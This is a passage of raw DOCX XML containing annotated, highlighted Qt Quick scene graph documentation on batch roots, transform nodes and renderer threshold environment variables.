          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00815754">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>and</w:t>
      </w:r>
      <w:r w:rsidR="00CA563B">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00CA563B">
        <w:rPr>
          <w:rStyle w:val="HTML2"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>QSG_ATLAS_SIZE_LIMIT</w:t>
      </w:r>
      <w:r w:rsidRPr="00815754">
        <w:rPr>
          <w:rStyle w:val="HTML2"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>=[size]</w:t>
      </w:r>
      <w:r w:rsidRPr="00815754">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">. Changing these values will mostly be </w:t>
      </w:r>
      <w:r w:rsidRPr="00CA563B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>interesting for platform vendors</w:t>
      </w:r>
      <w:r w:rsidRPr="00815754">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00815754" w:rsidRPr="00815754" w:rsidRDefault="00815754" w:rsidP="007959FF">
      <w:pPr>
        <w:pStyle w:val="5"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="1701" w:name="batch-roots"/>
      <w:bookmarkStart w:id="1702" w:name="_Toc483000899"/>
      <w:bookmarkStart w:id="1703" w:name="_Toc483003890"/>
      <w:bookmarkStart w:id="1704" w:name="_Toc483604243"/>
      <w:bookmarkStart w:id="1705" w:name="_Toc483605463"/>
      <w:bookmarkEnd w:id="1701"/>
      <w:r w:rsidRPr="007959FF">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Batch Roots</w:t>
      </w:r>
      <w:bookmarkEnd w:id="1702"/>
      <w:bookmarkEnd w:id="1703"/>
      <w:bookmarkEnd w:id="1704"/>
      <w:bookmarkEnd w:id="1705"/>
    </w:p>
    <w:p w:rsidR="00815754" w:rsidRPr="007959FF" w:rsidRDefault="00815754" w:rsidP="00815754">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="360" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CA563B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>In addition to merging compatible primitives into batches</w:t>
      </w:r>
      <w:r w:rsidRPr="00815754">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">, the </w:t>
      </w:r>
      <w:r w:rsidRPr="00CA563B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>default</w:t>
      </w:r>
      <w:r w:rsidRPr="00815754">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> renderer also </w:t>
      </w:r>
      <w:r w:rsidRPr="00CA563B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>tries to minimize the amount of data that needs to be sent to the GPU for every frame</w:t>
      </w:r>
      <w:r w:rsidRPr="00815754">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">. The default renderer identifies subtrees which belong together and tries to put these into separate batches. </w:t>
      </w:r>
      <w:r w:rsidRPr="00CA563B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Once batches are identified, they are merged, uploaded and stored in GPU memory, using Vertex Buffer Objects</w:t>
      </w:r>
      <w:r w:rsidRPr="00815754">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00CA563B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="007959FF">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">// </w:t>
      </w:r>
      <w:r w:rsidR="007959FF">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Intb</w:t>
      </w:r>
      <w:r w:rsidR="007959FF">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:color w:val="FF0000"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>u //</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00815754" w:rsidRPr="00815754" w:rsidRDefault="00815754" w:rsidP="007959FF">
      <w:pPr>
        <w:pStyle w:val="5"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="1706" w:name="transform-nodes"/>
      <w:bookmarkStart w:id="1707" w:name="_Toc483000900"/>
      <w:bookmarkStart w:id="1708" w:name="_Toc483003891"/>
      <w:bookmarkStart w:id="1709" w:name="_Toc483604244"/>
      <w:bookmarkStart w:id="1710" w:name="_Toc483605464"/>
      <w:bookmarkEnd w:id="1706"/>
      <w:r w:rsidRPr="007959FF">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Transform Nodes</w:t>
      </w:r>
      <w:bookmarkEnd w:id="1707"/>
      <w:bookmarkEnd w:id="1708"/>
      <w:bookmarkEnd w:id="1709"/>
      <w:bookmarkEnd w:id="1710"/>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CA563B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Each Qt Quick Item inserts a</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA563B">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId2069" w:history="1">
        <w:r w:rsidRPr="00CA563B">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="17A81A"/>
            <w:highlight w:val="yellow"/>
            <w:u w:val="none"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>QSGTransformNode</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00CA563B">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00CA563B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>into the scene graph tree to manage its x, y, scale or rotation</w:t>
      </w:r>
      <w:r w:rsidRPr="00815754">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">. Child items will be populated under this transform node. The </w:t>
      </w:r>
      <w:r w:rsidRPr="00CA563B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>default renderer tracks the state of transform nodes between frames</w:t>
      </w:r>
      <w:r w:rsidRPr="00815754">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">, and </w:t>
      </w:r>
      <w:r w:rsidRPr="00CA563B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>will look at subtrees to decide if a transform node is a good candidate to become a root for a set of batches</w:t>
      </w:r>
      <w:r w:rsidRPr="00815754">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">. A </w:t>
      </w:r>
      <w:r w:rsidRPr="00CA563B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>transform node which changes between frames and which has a fairly complex subtree, can become a batch root</w:t>
      </w:r>
      <w:r w:rsidRPr="00815754">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00815754" w:rsidRPr="00377C1C" w:rsidRDefault="00815754" w:rsidP="00815754">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="360" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CA563B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>QSGGeometryNodes</w:t>
      </w:r>
      <w:r w:rsidRPr="00815754">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> in the subtree of a batch root </w:t>
      </w:r>
      <w:r w:rsidRPr="007959FF">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="FF0000"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">are </w:t>
      </w:r>
      <w:r w:rsidRPr="007959FF">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>pre-transformed relative</w:t>
      </w:r>
      <w:r w:rsidRPr="007959FF">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="FF0000"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> to the root </w:t>
      </w:r>
      <w:r w:rsidRPr="007959FF">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>on the CPU</w:t>
      </w:r>
      <w:r w:rsidRPr="00815754">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidRPr="00CA563B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>They are then uploaded and retained on the GPU</w:t>
      </w:r>
      <w:r w:rsidRPr="00815754">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidRPr="003C1314">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>When the transform changes, the renderer only needs to update the matrix of the root, not each individual item, making list and grid scrolling very fast</w:t>
      </w:r>
      <w:r w:rsidR="007959FF">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidRPr="00815754">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">For </w:t>
      </w:r>
      <w:r w:rsidRPr="00377C1C">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>successive frames, as long as nodes are not being added or removed, rendering the list is effectively for free</w:t>
      </w:r>
      <w:r w:rsidRPr="00815754">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">. When </w:t>
      </w:r>
      <w:r w:rsidRPr="00377C1C">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>new content enters the subtree, the batch that gets it is rebuilt, but this is still relatively fast</w:t>
      </w:r>
      <w:r w:rsidRPr="00815754">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">. There are </w:t>
      </w:r>
      <w:r w:rsidRPr="00377C1C">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">usually several unchanging frames for every frame with added or removed nodes when panning through a </w:t>
      </w:r>
      <w:r w:rsidRPr="007959FF">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>grid or list</w:t>
      </w:r>
      <w:r w:rsidRPr="00815754">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007959FF" w:rsidRPr="007959FF" w:rsidRDefault="00815754" w:rsidP="007959FF">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="360" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00377C1C">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Another benefit of identifying transform nodes as batch roots is that it allows the renderer to retain the parts of the tree that has not changed</w:t>
      </w:r>
      <w:r w:rsidRPr="00815754">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">. For </w:t>
      </w:r>
      <w:r w:rsidRPr="00377C1C">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>instance</w:t>
      </w:r>
      <w:r w:rsidRPr="00815754">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">, say a UI consists of a list and a button row. When the list is being scrolled and delegates are being added and removed, the rest of the UI, the button row, is unchanged and can be drawn using the </w:t>
      </w:r>
      <w:r w:rsidRPr="00377C1C">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>geometry already stored on the GPU</w:t>
      </w:r>
      <w:r w:rsidRPr="00815754">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00377C1C">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="007959FF">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">// </w:t>
      </w:r>
      <w:r w:rsidR="007959FF" w:rsidRPr="007959FF">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:color w:val="FF0000"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>intbu technical details</w:t>
      </w:r>
      <w:r w:rsidR="007959FF">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> //</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00815754" w:rsidRPr="00377C1C" w:rsidRDefault="00815754" w:rsidP="007959FF">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="360" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00815754">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">The </w:t>
      </w:r>
      <w:r w:rsidRPr="007959FF">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="FF0000"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>node and vertex threshold</w:t>
      </w:r>
      <w:r w:rsidRPr="00815754">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> for a transform node to become a batch root can be overridden using the environment variables</w:t>
      </w:r>
      <w:r w:rsidR="00377C1C">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00377C1C">
        <w:rPr>
          <w:rStyle w:val="HTML2"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>QSG_RENDERER_BATCH_NODE_THRESHOLD</w:t>
      </w:r>
      <w:r w:rsidRPr="00815754">
        <w:rPr>
          <w:rStyle w:val="HTML2"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>=[count]</w:t>
      </w:r>
      <w:r w:rsidR="00377C1C">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00815754">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>and</w:t>
      </w:r>
      <w:r w:rsidR="00377C1C">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00377C1C">
        <w:rPr>
          <w:rStyle w:val="HTML2"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>QSG_RENDERER_BATCH_VERTEX_THRESHOLD</w:t>
      </w:r>
      <w:r w:rsidRPr="00815754">
        <w:rPr>
          <w:rStyle w:val="HTML2"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>=[count]</w:t>
      </w:r>
      <w:r w:rsidRPr="00815754">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">. Overriding these flags will be mostly useful </w:t>
      </w:r>
      <w:r w:rsidRPr="00377C1C">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>for platform vendors</w:t>
      </w:r>
      <w:r w:rsidRPr="00815754">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00815754" w:rsidRPr="00377C1C" w:rsidRDefault="00815754" w:rsidP="00815754">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
